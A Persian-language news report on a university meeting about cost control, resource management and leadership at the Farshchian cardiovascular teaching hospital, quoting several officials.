به منظور مدیریت بهینه هزینه و افزایش کارایی منابع، کارگروه مدیریت منابع – مصارف و تحلیل وضعیت مالی و عملکردی مرکز آموزشی درمانی قلب فرشچیان با حضور مسئولان این مرکز در دفتر معاونت توسعه مدیریت و منابع دانشگاه برگزار شد.

این جلسه با حضور معاون توسعه مدیریت و منابع دانشگاه، مدیر امور مالی، مدیر امور بودجه و برنامه‌ریزی دانشگاه، کارشناسان ستادی این حوزه و همچنین مدیر و اعضای تیم مدیریتی مرکز آموزشی درمانی قلب و عروق فرشچیان برگزار شد.

رحیمی، معاون توسعه مدیریت و منابع دانشگاه با توجه به اولویت‌دهی سیاست‌های وزارت بهداشت، درمان و آموزش پزشکی در راستای مدیریت هزینه و درآمد در سال جاری، برگزاری این جلسات و تداوم‌ آن‌ها را گامی مهم در تحقق این امر برشمرد.

وی با توجه به نتایج عملکرد مالی مرکز آموزشی درمانی قلب و عروق فرشچیان بر اصلاح فرایندهایی با هزینه‌های بالا در سیستم، ساماندهی انبارها و انجام خرید بر اساس نیازسنجی واقعی، مدیریت مصرف داروهای گران‌قیمت و پرمصرف، بررسی وضعیت اقلام ‌راکد و مازاد، رسیدگی دقیق به اسناد بیمه‌ای، خدمات القائی و توجه به فرایندهای درآمدزا تاکید کرد.

بهروز رحیمی توجه به اصلاح نظام انبارداری، مالی، درآمد و مدیریت منابع انسانی و نظارت و ارزیابی مستمر را از مهم‌ترین اولویت‌ها و برنامه‌های تمامی مراکز در استان برشمرد.

او تصریح کرد: مدیریت مشارکتی بهترین نوع مدیریت یک مجموعه است و راهکار آن، برقراری و ایجاد جلسات با حضور کارشناسان آن مجموعه است. در حال حاضر مدیریت سنتی و قدیمی محکوم به فنا است و مدیریت نوین، خلاق و مشارکتی باید الگو و سرلوحه مدیران فعلی باشد تا بتوانند از افکار و عقاید تمامی افراد در تیم اجرایی خود بهره‌گیری کنند و قطعا آن تیم توان پیروزی در هر زمینه‌ای را خواهد داشت.

معاون توسعه مدیریت و منابع دانشگاه گفت: جوانان را در عرصه‌های کاری و مدیریتی نباید دست کم گرفت و از آنان باید در راستای پیشبرد اهداف مدیریتی و سازمانی استفاده کرد، چرا که توان جسمی و فکری آنان قابل ستایش است و در بحث جانشین‌پروری می‌توانند مدیران بسیار قدرتمند در آینده نزدیک باشند.

وی با بیان اینکه «شنیدین» یکی از مهم‌ترین ارکان مدیریت سازمانی است، هشدار داد: مدیرانی که وقتی برای شنیدن افکارات و عقاید تیم اجرایی خود نمی‌گذارند و تنها افکار و تصمیمات خود را دیکته‌وار عنوان میکنند محکوم به شکست هستند.

معاون توسعه دانشگاه، بلوغ سازمانی را رفتار مهربانانه و متانت در برخورد با تیم اجرایی توام با عمل قاطعانه بر مبنای تشخیص درست تعریف کرد. او بلوغ سازمانی را یکی از ارکان مهم مدیریت برشمرد و از مدیران خواست به آن توجه ویژه داشته باشند.

باقری، مدیر مرکز آموزشی درمانی قلب و عروق فرشچیان نیز سیاستگذاری مطلوب دانشگاه و تدوین برنامه‌های موثر را گامی مهم و ضروری در ارتقای بهره‌وری بیمارستان‌ها دانست.

وی در ادامه گزارش عملکرد این مرکز را در خصوص مدیریت بهینه‌سازی منابع و مصارف، اجرای دستورالعمل زنجیره کالا و برنامه عملیاتی سال ۹۷ ارائه داد.

در ادامه، دکتر نیاستی مدیر بودجه و برنامه‌ریزی دانشگاه نیز مصادیقی از مدیریت صحیح منابع و مصارف در دانشگاه را ارائه و اظهار کرد: هر اندازه که منابع مالی دانشگاه را بهتر کنترل کنیم، توان مالی دانشگاه افزایش پیدا می‌کند و این امر به طور مستقیم در رفاه کارکنان، تامین تجهیزات و خدمت‌رسانی به مردم تاثیر مثبت خواهد شد.

حلافی، مدیر امور مالی دانشگاه بر لزوم نظارت صحیح مسئولان امور مالی بر دستورالعمل زنجیره کالا و خدمات و اصلاح فرایندهایی که در گذشته به نادرستی پیش میرفت، تاکید کرد.

در پایان این نشست، هر یک از کارشناسان حاضر در جلسه نقطه نظرات خود را بیان و راهکارهایی در جهت بهبود کیفیت سیستم مالی و منابع بیمارستان فوق تخصصی قلب و عروق فرشچیان مطرح کردند.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>